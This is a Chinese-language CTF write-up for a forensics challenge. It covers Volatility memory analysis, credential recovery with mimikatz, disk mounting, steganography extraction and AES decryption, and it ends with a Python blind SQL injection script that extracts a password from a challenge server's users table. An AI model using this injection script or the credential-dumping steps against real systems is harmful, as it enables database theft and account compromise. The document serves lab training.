ez_forenisc
获取内存镜像的摘要信息,比如系统版本: imageinfo
查看进程信息: pslist
python2 vol.py -f pc.raw --profile=Win7SP1x64 pslist
扫描 cmd命令使用情况: cmdscan
python2 vol.py -f pc.raw --profile=Win7SP1x64 cmdscan
提示说有屏幕截图
查看屏幕截图:
python2 vol.py -f pc.raw --profile=Win7SP1x64 screenshot --dump-dir=./
文件名是thes3cret
查找文件: filescan 、grep
python2 vol.py -f pc.raw --profile=Win7SP1x64 filescan | grep 'thes3cret'
导出文件:dumpfiles
python2 vol.py -f pc.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003eeb4650 -D ./
发现密文
查看明文密码: mimikatz
550f37c7748e
挂载pc.vmdk
FTK Imager 打开后Mount 该文件
再用efdd 打开,配合pc.raw挂载
挂载成功到F盘
可以打开文件了
一个png ,用zsteg打开能看见有个zip,提取出来
压缩包密码就是上面 的admin密码550f37c7748e
这串数字是八进制 ,也可直接ciphey
得到了密钥 358daebef0b7d
上面也得到了密文U2Fs.... 是AES密文
源码找可疑路径
访问后有源码,有过滤
import requests
import time
def getDatabase():
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
#sql="select database()"
sql="select group_concat(table_name) from information_schema.tables where table_schema=database()"
sql="select group_concat(column_name) from information_schema.columns where table_name='users'"
sql="select password from ctf.users where id=2"
//flag在id为2的表里
payload= "1 and (ascii(substr(({}),{},1))<{})#".format(sql,i,mid)
res = requests.post("http://994a7e03-36fb-43b4-9bfe-640cc35ce531.node4.buuoj.cn:81//SUPPERAPI.php?id="+payload)
# print(payload)
# print(res.text.split("\n")[-1])
if "admin" in res.text:
high = mid
else:
low = mid+1
mid=(low+high)//2
if mid <= 32 or mid >= 127:
break
time.sleep(1)
ans += chr(mid-1)
print("res is -> "+ans)
getDatabase()
